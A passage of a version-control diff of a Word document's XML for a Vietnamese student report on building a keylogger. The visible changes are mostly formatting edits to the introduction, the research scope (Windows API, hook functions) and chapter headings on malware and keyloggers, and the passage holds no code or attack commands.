-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Project nghiên cứu cách tạo ra Keylogger, từ đó giúp em học thêm được những công nghệ mới, những kiến thức sâu hơn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Project này sẽ là tiền đề cho Project 2, Project 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> của em</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sau đó.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>4. Phạm vi nghiên cứu</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Project này tập trung nghiên cứu vào Windows API, các hàm HOOK, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>những macro liên quan đến Keyboard,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Project được thực hiện trong vòng 10 tuần kể từ khi quyết định đề tài.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>5. Đóng góp của đề tài</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Em làm đề tài này với hi vọng sẽ giúp người đọc hiểu thêm về Keylogger cũng như các loại mã độc khác, để từ đó có biện pháp phòng chống hiệu quả.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>6. Kết cấu bài báo cáo</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3211,8 +5846,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc56805881"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc43674104"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc43674104"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc57761762"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3223,9 +5858,9 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>CHƯƠNG I:</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
+        <w:t xml:space="preserve">CHƯƠNG I: </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3235,10 +5870,27 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-      <w:r>
+        <w:t>TỔNG QUAN VỀ ĐỀ TÀI KEYLOGGER</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -3247,47 +5899,42 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>TỔNG QUAN VỀ ĐỀ TÀI KEYLOGGER</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="15" w:name="_Toc57761763"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">1.1. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Khái niệm mã độc</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3351,23 +5998,43 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="16" w:name="_Toc57761764"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>1.2. Các loại mã độc</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3396,13 +6063,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3411,6 +6082,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3500,13 +6173,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3515,6 +6192,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3548,13 +6227,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3564,6 +6247,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3597,13 +6282,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3612,6 +6301,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3701,13 +6392,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3716,6 +6411,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3789,13 +6486,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3804,6 +6505,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3857,13 +6560,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3872,6 +6579,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3905,13 +6614,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -3920,6 +6633,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4033,13 +6748,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4048,6 +6767,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4142,13 +6863,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4157,6 +6882,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4255,13 +6982,21 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4275,13 +7010,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4291,6 +7030,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4324,13 +7065,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4339,6 +7084,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4367,30 +7114,32 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc57761765"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>1.3. Khái niệm Keylogger</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="17"/>
